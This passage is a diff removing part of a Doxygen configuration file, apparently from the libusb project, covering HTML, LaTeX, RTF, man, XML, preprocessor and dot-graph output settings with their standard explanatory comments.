-# Eclipse, the contents of the directory containing the HTML and XML files needs
-# to be copied into the plugins directory of eclipse. The name of the directory
-# within the plugins directory should be the same as the ECLIPSE_DOC_ID value.
-# After copying Eclipse needs to be restarted before the help appears.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the Eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have this
-# name. Each documentation set should have its own identifier.
-# The default value is: org.doxygen.Project.
-# This tag requires that the tag GENERATE_ECLIPSEHELP is set to YES.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# If you want full control over the layout of the generated HTML pages it might
-# be necessary to disable the index and replace it with your own. The
-# DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs) at top
-# of each HTML page. A value of NO enables the index and the value YES disables
-# it. Since the tabs in the index contain the same information as the navigation
-# tree, you can set this option to YES if you also set GENERATE_TREEVIEW to YES.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information. If the tag
-# value is set to YES, a side panel will be generated containing a tree-like
-# index structure (just like the one that is generated for HTML Help). For this
-# to work a browser that supports JavaScript, DHTML, CSS and frames is required
-# (i.e. any modern browser). Windows users are probably better off using the
-# HTML help feature. Via custom stylesheets (see HTML_EXTRA_STYLESHEET) one can
-# further fine-tune the look of the index. As an example, the default style
-# sheet generated by doxygen has an example that shows how to put an image at
-# the root of the tree instead of the PROJECT_NAME. Since the tree basically has
-# the same information as the tab index, you could consider setting
-# DISABLE_INDEX to YES when enabling this option.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-GENERATE_TREEVIEW      = NO
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values that
-# doxygen will group on one line in the generated HTML documentation.
-#
-# Note that a value of 0 will completely suppress the enum values from appearing
-# in the overview section.
-# Minimum value: 0, maximum value: 20, default value: 4.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be used
-# to set the initial width (in pixels) of the frame in which the tree is shown.
-# Minimum value: 0, maximum value: 1500, default value: 250.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open links to
-# external symbols imported via tag files in a separate window.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of LaTeX formulas included as images in
-# the HTML documentation. When you change the font size after a successful
-# doxygen run you need to manually remove any form_*.png images from the HTML
-# output directory to force them to be regenerated.
-# Minimum value: 8, maximum value: 50, default value: 10.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are not
-# supported properly for IE 6.0, but are supported on all modern browsers.
-#
-# Note that when changing this option you need to delete any form_*.png files in
-# the HTML output directory before the changes have effect.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax (see
-# http://www.mathjax.org) which uses client side Javascript for the rendering
-# instead of using prerendered bitmaps. Use this if you do not have LaTeX
-# installed or if you want to formulas look prettier in the HTML output. When
-# enabled you may also need to install MathJax separately and configure the path
-# to it using the MATHJAX_RELPATH option.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you can set the default output format to be used for
-# the MathJax output. See the MathJax site (see:
-# http://docs.mathjax.org/en/latest/output.html) for more details.
-# Possible values are: HTML-CSS (which is slower, but has the best
-# compatibility), NativeMML (i.e. MathML) and SVG.
-# The default value is: HTML-CSS.
-# This tag requires that the tag USE_MATHJAX is set to YES.
-
-MATHJAX_FORMAT         = HTML-CSS
-
-# When MathJax is enabled you need to specify the location relative to the HTML
-# output directory using the MATHJAX_RELPATH option. The destination directory
-# should contain the MathJax.js script. For instance, if the mathjax directory
-# is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to the MathJax
-# Content Delivery Network so you can quickly see the result without installing
-# MathJax. However, it is strongly recommended to install a local copy of
-# MathJax from http://www.mathjax.org before deployment.
-# The default value is: http://cdn.mathjax.org/mathjax/latest.
-# This tag requires that the tag USE_MATHJAX is set to YES.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or more MathJax
-# extension names that should be enabled during MathJax rendering. For example
-# MATHJAX_EXTENSIONS = TeX/AMSmath TeX/AMSsymbols
-# This tag requires that the tag USE_MATHJAX is set to YES.
-
-MATHJAX_EXTENSIONS     =
-
-# The MATHJAX_CODEFILE tag can be used to specify a file with javascript pieces
-# of code that will be used on startup of the MathJax code. See the MathJax site
-# (see: http://docs.mathjax.org/en/latest/output.html) for more details. For an
-# example see the documentation.
-# This tag requires that the tag USE_MATHJAX is set to YES.
-
-MATHJAX_CODEFILE       =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box for
-# the HTML output. The underlying search engine uses javascript and DHTML and
-# should work on any modern browser. Note that when using HTML help
-# (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets (GENERATE_DOCSET)
-# there is already a search function so this one should typically be disabled.
-# For large projects the javascript based search engine can be slow, then
-# enabling SERVER_BASED_SEARCH may provide a better solution. It is possible to
-# search using the keyboard; to jump to the search box use <access key> + S
-# (what the <access key> is depends on the OS and browser, but it is typically
-# <CTRL>, <ALT>/<option>, or both). Inside the search box use the <cursor down
-# key> to jump into the search results window, the results can be navigated
-# using the <cursor keys>. Press <Enter> to select an item or <escape> to cancel
-# the search. The filter options can be selected when the cursor is inside the
-# search box by pressing <Shift>+<cursor down>. Also here use the <cursor keys>
-# to select a filter and <Enter> or <escape> to activate or cancel the filter
-# option.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-SEARCHENGINE           = NO
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a web server instead of a web client using Javascript. There
-# are two flavours of web server based searching depending on the
-# EXTERNAL_SEARCH setting. When disabled, doxygen will generate a PHP script for
-# searching and an index file used by the script. When EXTERNAL_SEARCH is
-# enabled the indexing and searching needs to be provided by external tools. See
-# the section "External Indexing and Searching" for details.
-# The default value is: NO.
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-SERVER_BASED_SEARCH    = NO
-
-# When EXTERNAL_SEARCH tag is enabled doxygen will no longer generate the PHP
-# script for searching. Instead the search results are written to an XML file
-# which needs to be processed by an external indexer. Doxygen will invoke an
-# external search engine pointed to by the SEARCHENGINE_URL option to obtain the
-# search results.
-#
-# Doxygen ships with an example indexer ( doxyindexer) and search engine
-# (doxysearch.cgi) which are based on the open source search engine library
-# Xapian (see: http://xapian.org/).
-#
-# See the section "External Indexing and Searching" for details.
-# The default value is: NO.
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-EXTERNAL_SEARCH        = NO
-
-# The SEARCHENGINE_URL should point to a search engine hosted by a web server
-# which will return the search results when EXTERNAL_SEARCH is enabled.
-#
-# Doxygen ships with an example indexer ( doxyindexer) and search engine
-# (doxysearch.cgi) which are based on the open source search engine library
-# Xapian (see: http://xapian.org/). See the section "External Indexing and
-# Searching" for details.
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-SEARCHENGINE_URL       =
-
-# When SERVER_BASED_SEARCH and EXTERNAL_SEARCH are both enabled the unindexed
-# search data is written to a file for indexing by an external tool. With the
-# SEARCHDATA_FILE tag the name of this file can be specified.
-# The default file is: searchdata.xml.
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-SEARCHDATA_FILE        = searchdata.xml
-
-# When SERVER_BASED_SEARCH and EXTERNAL_SEARCH are both enabled the
-# EXTERNAL_SEARCH_ID tag can be used as an identifier for the project. This is
-# useful in combination with EXTRA_SEARCH_MAPPINGS to search through multiple
-# projects and redirect the results back to the right project.
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-EXTERNAL_SEARCH_ID     =
-
-# The EXTRA_SEARCH_MAPPINGS tag can be used to enable searching through doxygen
-# projects other than the one defined by this configuration file, but that are
-# all added to the same external search index. Each project needs to have a
-# unique id set via EXTERNAL_SEARCH_ID. The search mapping then maps the id of
-# to a relative location where the documentation can be found. The format is:
-# EXTRA_SEARCH_MAPPINGS = tagname1=loc1 tagname2=loc2 ...
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-EXTRA_SEARCH_MAPPINGS  =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES doxygen will generate LaTeX output.
-# The default value is: YES.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put. If a
-# relative path is entered the value of OUTPUT_DIRECTORY will be put in front of
-# it.
-# The default directory is: latex.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked.
-#
-# Note that when enabling USE_PDFLATEX this option is only used for generating
-# bitmaps for formulas in the HTML output, but not in the Makefile that is
-# written to the output directory.
-# The default file is: latex.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to generate
-# index for LaTeX.
-# The default file is: makeindex.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES doxygen generates more compact LaTeX
-# documents. This may be useful for small projects and may help to save some
-# trees in general.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used by the
-# printer.
-# Possible values are: a4 (210 x 297 mm), letter (8.5 x 11 inches), legal (8.5 x
-# 14 inches) and executive (7.25 x 10.5 inches).
-# The default value is: a4.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be used to specify one or more LaTeX package names
-# that should be included in the LaTeX output. To get the times font for
-# instance you can specify
-# EXTRA_PACKAGES=times
-# If left blank no extra packages will be included.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for the
-# generated LaTeX document. The header should contain everything until the first
-# chapter. If it is left blank doxygen will generate a standard header. See
-# section "Doxygen usage" for information on how to let doxygen write the
-# default header to a separate file.
-#
-# Note: Only use a user-defined header if you know what you are doing! The
-# following commands have a special meaning inside the header: $title,
-# $datetime, $date, $doxygenversion, $projectname, $projectnumber. Doxygen will
-# replace them by respectively the title of the page, the current date and time,
-# only the current date, the version number of doxygen, the project name (see
-# PROJECT_NAME), or the project number (see PROJECT_NUMBER).
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for the
-# generated LaTeX document. The footer should contain everything after the last
-# chapter. If it is left blank doxygen will generate a standard footer.
-#
-# Note: Only use a user-defined footer if you know what you are doing!
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_FOOTER           =
-
-# The LATEX_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the LATEX_OUTPUT output
-# directory. Note that the files will be copied as-is; there are no commands or
-# markers available.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_EXTRA_FILES      =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated is
-# prepared for conversion to PDF (using ps2pdf or pdflatex). The PDF file will
-# contain links (just like the HTML output) instead of page references. This
-# makes the output suitable for online browsing using a PDF viewer.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-PDF_HYPERLINKS         = NO
-
-# If the LATEX_PDFLATEX tag is set to YES, doxygen will use pdflatex to generate
-# the PDF file directly from the LaTeX files. Set this option to YES to get a
-# higher quality PDF documentation.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-USE_PDFLATEX           = NO
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \batchmode
-# command to the generated LaTeX files. This will instruct LaTeX to keep running
-# if errors occur, instead of asking the user for help. This option is also used
-# when generating formulas in HTML.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_BATCHMODE        = NO
-
-# If the LATEX_HIDE_INDICES tag is set to YES then doxygen will not include the
-# index chapters (such as File Index, Compound Index, etc.) in the output.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_HIDE_INDICES     = NO
-
-# If the LATEX_SOURCE_CODE tag is set to YES then doxygen will include source
-# code with syntax highlighting in the LaTeX output.
-#
-# Note that which sources are shown also depends on other settings such as
-# SOURCE_BROWSER.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. See
-# http://en.wikipedia.org/wiki/BibTeX and \cite for more info.
-# The default value is: plain.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# Configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES doxygen will generate RTF output. The
-# RTF output is optimized for Word 97 and may not look too pretty with other RTF
-# readers/editors.
-# The default value is: NO.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put. If a
-# relative path is entered the value of OUTPUT_DIRECTORY will be put in front of
-# it.
-# The default directory is: rtf.
-# This tag requires that the tag GENERATE_RTF is set to YES.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES doxygen generates more compact RTF
-# documents. This may be useful for small projects and may help to save some
-# trees in general.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_RTF is set to YES.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated will
-# contain hyperlink fields. The RTF file will contain links (just like the HTML
-# output) instead of page references. This makes the output suitable for online
-# browsing using Word or some other Word compatible readers that support those
-# fields.
-#
-# Note: WordPad (write) and others do not support links.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_RTF is set to YES.
-
-RTF_HYPERLINKS         = NO
-
-# Load stylesheet definitions from file. Syntax is similar to doxygen's config
-# file, i.e. a series of assignments. You only have to provide replacements,
-# missing definitions are set to their default value.
-#
-# See also section "Doxygen usage" for information on how to generate the
-# default style sheet that doxygen normally uses.
-# This tag requires that the tag GENERATE_RTF is set to YES.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an RTF document. Syntax is
-# similar to doxygen's config file. A template extensions file can be generated
-# using doxygen -e rtf extensionFile.
-# This tag requires that the tag GENERATE_RTF is set to YES.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES doxygen will generate man pages for
-# classes and files.
-# The default value is: NO.
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put. If a
-# relative path is entered the value of OUTPUT_DIRECTORY will be put in front of
-# it. A directory man3 will be created inside the directory specified by
-# MAN_OUTPUT.
-# The default directory is: man.
-# This tag requires that the tag GENERATE_MAN is set to YES.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to the generated
-# man pages. In case the manual section does not start with a number, the number
-# 3 is prepended. The dot (.) at the beginning of the MAN_EXTENSION tag is
-# optional.
-# The default value is: .3.
-# This tag requires that the tag GENERATE_MAN is set to YES.
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and doxygen generates man output, then it
-# will generate one additional man file for each entity documented in the real
-# man page(s). These additional files only source the real man page, but without
-# them the man command would be unable to find the correct page.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_MAN is set to YES.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# Configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES doxygen will generate an XML file that
-# captures the structure of the code including all documentation.
-# The default value is: NO.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put. If a
-# relative path is entered the value of OUTPUT_DIRECTORY will be put in front of
-# it.
-# The default directory is: xml.
-# This tag requires that the tag GENERATE_XML is set to YES.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify a XML schema, which can be used by a
-# validating XML parser to check the syntax of the XML files.
-# This tag requires that the tag GENERATE_XML is set to YES.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify a XML DTD, which can be used by a
-# validating XML parser to check the syntax of the XML files.
-# This tag requires that the tag GENERATE_XML is set to YES.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES doxygen will dump the program
-# listings (including syntax highlighting and cross-referencing information) to
-# the XML output. Note that enabling this will significantly increase the size
-# of the XML output.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_XML is set to YES.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# Configuration options related to the DOCBOOK output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_DOCBOOK tag is set to YES doxygen will generate Docbook files
-# that can be used to generate PDF.
-# The default value is: NO.
-
-GENERATE_DOCBOOK       = NO
-
-# The DOCBOOK_OUTPUT tag is used to specify where the Docbook pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be put in
-# front of it.
-# The default directory is: docbook.
-# This tag requires that the tag GENERATE_DOCBOOK is set to YES.
-
-DOCBOOK_OUTPUT         = docbook
-
-#---------------------------------------------------------------------------
-# Configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES doxygen will generate an AutoGen
-# Definitions (see http://autogen.sf.net) file that captures the structure of
-# the code including all documentation. Note that this feature is still
-# experimental and incomplete at the moment.
-# The default value is: NO.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# Configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES doxygen will generate a Perl module
-# file that captures the structure of the code including all documentation.
-#
-# Note that this feature is still experimental and incomplete at the moment.
-# The default value is: NO.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES doxygen will generate the necessary
-# Makefile rules, Perl scripts and LaTeX code to be able to generate PDF and DVI
-# output from the Perl module output.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_PERLMOD is set to YES.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be nicely
-# formatted so it can be parsed by a human reader. This is useful if you want to
-# understand what is going on. On the other hand, if this tag is set to NO the
-# size of the Perl module output will be much smaller and Perl will parse it
-# just the same.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_PERLMOD is set to YES.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file are
-# prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX. This is useful
-# so different doxyrules.make files included by the same Makefile don't
-# overwrite each other's variables.
-# This tag requires that the tag GENERATE_PERLMOD is set to YES.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES doxygen will evaluate all
-# C-preprocessor directives found in the sources and include files.
-# The default value is: YES.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES doxygen will expand all macro names
-# in the source code. If set to NO only conditional compilation will be
-# performed. Macro expansion can be done in a controlled way by setting
-# EXPAND_ONLY_PREDEF to YES.
-# The default value is: NO.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-MACRO_EXPANSION        = YES
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES then
-# the macro expansion is limited to the macros specified with the PREDEFINED and
-# EXPAND_AS_DEFINED tags.
-# The default value is: NO.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-EXPAND_ONLY_PREDEF     = YES
-
-# If the SEARCH_INCLUDES tag is set to YES the includes files in the
-# INCLUDE_PATH will be searched if a #include is found.
-# The default value is: YES.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by the
-# preprocessor.
-# This tag requires that the tag SEARCH_INCLUDES is set to YES.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will be
-# used.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that are
-# defined before the preprocessor is started (similar to the -D option of e.g.
-# gcc). The argument of the tag is a list of macros of the form: name or
-# name=definition (no spaces). If the definition and the "=" are omitted, "=1"
-# is assumed. To prevent a macro definition from being undefined via #undef or
-# recursively expanded use the := operator instead of the = operator.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-PREDEFINED             = API_EXPORTED= \
-                         LIBUSB_CALL= \
-                         DEFAULT_VISIBILITY=
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then this
-# tag can be used to specify a list of macro names that should be expanded. The
-# macro definition that is found in the sources will be used. Use the PREDEFINED
-# tag if you want to use a different macro definition that overrules the
-# definition found in the source code.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES then doxygen's preprocessor will
-# remove all refrences to function-like macros that are alone on a line, have an
-# all uppercase name, and do not end with a semicolon. Such function macros are
-# typically used for boiler-plate code, and will confuse the parser if not
-# removed.
-# The default value is: YES.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration options related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES tag can be used to specify one or more tag files. For each tag
-# file the location of the external documentation should be added. The format of
-# a tag file without this location is as follows:
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where loc1 and loc2 can be relative or absolute paths or URLs. See the
-# section "Linking to external documentation" for more information about the use
-# of tag files.
-# Note: Each tag file must have an unique name (where the name does NOT include
-# the path). If a tag file is not located in the directory in which doxygen is
-# run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create a
-# tag file that is based on the input files it reads. See section "Linking to
-# external documentation" for more information about the usage of tag files.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external class will be listed in the
-# class index. If set to NO only the inherited external classes will be listed.
-# The default value is: NO.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed in
-# the modules index. If set to NO, only the current project's groups will be
-# listed.
-# The default value is: YES.
-
-EXTERNAL_GROUPS        = YES
-
-# If the EXTERNAL_PAGES tag is set to YES all external pages will be listed in
-# the related pages index. If set to NO, only the current project's pages will
-# be listed.
-# The default value is: YES.
-
-EXTERNAL_PAGES         = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of 'which perl').
-# The default file (with absolute path) is: /usr/bin/perl.
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES doxygen will generate a class diagram
-# (in HTML and LaTeX) for classes with base or super classes. Setting the tag to
-# NO turns the diagrams off. Note that this option also works with HAVE_DOT
-# disabled, but it is recommended to install and use dot, since it yields more
-# powerful graphs.
-# The default value is: YES.
-
-CLASS_DIAGRAMS         = YES
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see:
-# http://www.mcternan.me.uk/mscgen/)) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide inheritance
-# and usage relations if the target is undocumented or is not a class.
-# The default value is: YES.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz (see:
-# http://www.graphviz.org/), a graph visualization toolkit from AT&T and Lucent
-# Bell Labs. The other options in this section have no effect if this option is
-# set to NO
-# The default value is: NO.
-
-HAVE_DOT               = NO
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is allowed
-# to run in parallel. When set to 0 doxygen will base this on the number of
-# processors available in the system. You can set it explicitly to a value
-# larger than 0 to get control over the balance between CPU load and processing
-# speed.
-# Minimum value: 0, maximum value: 32, default value: 0.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_NUM_THREADS        = 0
-
-# When you want a differently looking font n the dot files that doxygen
-# generates you can specify the font name using DOT_FONTNAME. You need to make
-# sure dot is able to find the font, which can be done by putting it in a
-# standard location or by setting the DOTFONTPATH environment variable or by
-# setting DOT_FONTPATH to the directory containing the font.
-# The default value is: Helvetica.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_FONTNAME           = FreeSans.ttf
-
-# The DOT_FONTSIZE tag can be used to set the size (in points) of the font of
-# dot graphs.
-# Minimum value: 4, maximum value: 24, default value: 10.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the default font as specified with
-# DOT_FONTNAME. If you specify a different font using DOT_FONTNAME you can set
-# the path where dot can find it using this tag.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH tag is set to YES then doxygen will generate a graph for
-# each documented class showing the direct and indirect inheritance relations.
-# Setting this tag to YES will force the CLASS_DIAGRAMS tag to NO.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-CLASS_GRAPH            = YES
-
-# If the COLLABORATION_GRAPH tag is set to YES then doxygen will generate a
-# graph for each documented class showing the direct and indirect implementation
-# dependencies (inheritance, containment, and class references variables) of the
-# class with other documented classes.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS tag is set to YES then doxygen will generate a graph for
-# groups, showing the direct groups dependencies.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside the
-# class node. If there are many fields or methods and many nodes the graph may
-# become too big to be useful. The UML_LIMIT_NUM_FIELDS threshold limits the
-# number of items for each type to make the size more manageable. Set this to 0
-# for no limit. Note that the threshold may be exceeded by 50% before the limit
-# is enforced. So when you set the threshold to 10, up to 15 fields may appear,
-# but if the number exceeds 15, the total amount of fields shown is limited to
-# 10.
-# Minimum value: 0, maximum value: 100, default value: 10.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If the TEMPLATE_RELATIONS tag is set to YES then the inheritance and
-# collaboration graphs will show the relations between templates and their
-# instances.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the INCLUDE_GRAPH, ENABLE_PREPROCESSING and SEARCH_INCLUDES tags are set to
-# YES then doxygen will generate a graph for each documented file showing the
-# direct and indirect include dependencies of the file with other documented
-# files.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-INCLUDE_GRAPH          = YES
-
-# If the INCLUDED_BY_GRAPH, ENABLE_PREPROCESSING and SEARCH_INCLUDES tags are
-# set to YES then doxygen will generate a graph for each documented file showing
-# the direct and indirect include dependencies of the file with other documented
-# files.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH tag is set to YES then doxygen will generate a call
-# dependency graph for every global function or class method.
